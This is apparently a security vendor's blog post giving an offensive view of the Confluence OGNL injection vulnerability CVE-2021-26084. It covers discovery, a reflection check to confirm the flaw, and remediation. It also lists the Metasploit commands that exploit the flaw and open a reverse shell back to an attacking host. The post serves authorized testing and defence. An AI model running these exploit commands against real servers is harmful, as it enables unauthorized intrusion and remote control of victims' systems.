Red Team: An Offensive Security Perspective on the Confluence Vulnerability (CVE-2021-26084)

The BlackBerry® Incident Response team recently covered the most common attacker tactics, techniques, and procedures (TTPs) for the recently disclosed Confluence Server and Data Center vulnerability (CVE-2021-26084) in our Blue Team defensive perspective article.

In this article, we’ll examine how this vulnerability is viewed from an offensive perspective, so you can discover and properly convey the risk within your environment. (As a quick reminder: You should only test your own systems after obtaining sufficient permission!)

The techniques covered below are useful in discovering unknown systems that could be affected. If you have a known affected system, such as in the case of an active threat actor breach, we recommend checking for signs of exploit before performing any of the discovery and validation steps below.

Discovery and Identification

In an ideal world, everyone would know every asset in their environment, along with the OS and application versions for everything running. But our environments are dynamic, and employees can stand up hosts and software – such as Confluence servers – without proper approval or documentation. We will cover a few of the potential methods to discover and identify these potentially vulnerable devices.

Version Information

The Confluence version can be found in multiple ways. The easiest method is to simply browse to the Confluence main page (Figure 1).

Figure 1: Version disclosure on the main page (Confluence 7.12.0)

Vulnerability Scanning

We are not promoting any specific vulnerability scanners; however there are at least three with plugins that can be used to discover Confluence servers and check for the presence of CVE-2021-26084:

• Tenable Nessus (Plugin ID: 152864)
• Rapid7 – InsightVM and Nexpose customers are covered in the Aug. 26, 2021, content release
• Qualys – Local check (Qualys ID: 375839) and Remote check (Qualys ID: 730172)

Qualys has also provided a description for how the plugins function. You could also script these checks if you need a low-tech, inexpensive discovery method.

The local Qualys checks for the vulnerable version of the Confluence Server searches for the presence of the following registry key:

• 32-bit: "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
• 64-bit: "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall”

The remote Qualys check tries two different unauthenticated methods:

1. It sends a crafted HTTP POST request to "pages/createpage-entervariables.action" and/or "pages/doenterpagevariables.action" to check if the target is vulnerable.

2. If the aforementioned technique doesn't work, it checks for the vulnerable version of Atlassian Confluence using a GET request to the login.action page.

Confirmation

To manually confirm whether the Confluence Server is vulnerable, send a POST request using curl to the /pages/createpage-entervariables.action page. The following example sends “queryString=vulnerable” to the server. If the string is reflected in the response page, then the application is vulnerable to CVE-2021-26084 (see Figure 2).

Figure 2: Reflected response from Confluence

Exploitation

As of Sept. 8, 2021, a Metasploit module was available to detect and exploit vulnerable Confluence servers. To perform this, grab the latest Metasploit version that includes the “atlassian_confluence_webwork_ognl_injection” module. Start msfconsole and use the commands below to load the exploit and to set the local and remote addresses. The default shell is a reverse bash shell, which is demonstrated in the following:

use exploit/linux/http/atlassian_confluence_webwork_ognl_injection

set RHOSTS <IP_OF_CONFLUENCE_SERVER>

set LHOST <IP_OF_ATTACKING_SERVER>

run

If successful, you will gain a shell under the context of the Confluence user (Figure 3).

Figure 3: Exploitation using the Metasploit module, gaining access as the Confluence Server user

Once a shell is gained on the server, post-exploitation is limited only by the attacker’s imagination. Report this finding immediately, then move to secure this host using the recommendations in the next section.

Actions to Take

After obtaining the version number of your Confluence Server or Data Center, check this list to see if you have an on-premise, affected version of the software. If you are running an affected version, the next step is to upgrade to a fixed version, if you’re able to do so. If you are not able to upgrade, implement the temporary workaround supplied by Atlassian.

Finally, it’s critical to check for signs of compromise on the Confluence host and surrounding environment. We listed some of the attacker techniques in the previous Blue Team defensive perspective article that should be detected if compromise has occurred.

Check the entire file system for any signs of web shells. Note that attackers can use very small web shells such as China Chopper, which can time-match itself to surrounding files to blend in and avoid detection.

Once you have confirmed the vulnerability (possibly using the methods above) and neutralized it, use the experience to convey the importance of security within your organization. There are plenty of security initiatives that can help mitigate the risk of these vulnerabilities, such as the following:

• Asset management
• Vulnerability management
  • Scanning
  • Tracking to remediation
  • Confirmation of remediation
• Endpoint Protection (EPP) software
• Endpoint Detection and Response (EDR) software
• Centralized log collection and correlation

The ability to detect, mitigate, and prevent should be top of mind for all organizations.

BlackBerry Cyber Suite and BlackBerry Guard stop these attacks

If in doubt regarding any of the steps in this article, call in the experts at BlackBerry to perform a Red Team assessment or forensic analysis, or to conduct a compromise assessment. BlackBerry customers can feel confident that our AI-driven BlackBerry® Cyber Suite, as well as our Managed Detection & Response (MDR) solution BlackBerry® Guard, are well-equipped to mitigate the risks posed by these continued external-facing vulnerabilities.

Core technology includes:

• BlackBerry® Protect provides automated malware prevention, application and script control, memory protection, and device policy enforcement.
• BlackBerry® Optics extends the threat prevention by using BlackBerry Optics Context Analysis Engine (CAE) rules to provide additional telemetry. The following rules were effective at identifying exploitation of the vulnerability:
  • Certutil Abuse
  • Powershell Download
  • Powershell Encoded Command
  • One-Liner ML Module
  • Account Discovery

Victim of an Attack?

In the unfortunate event that it is too late for prevention and you believe you have already been the victim of an attack, please contact us, regardless of your existing BlackBerry relationship.

The BlackBerry Incident Response team is made up of world-class consultants dedicated to handling response and containment services for a wide range of incidents, including ransomware and Advanced Persistent Threat (APT) cases.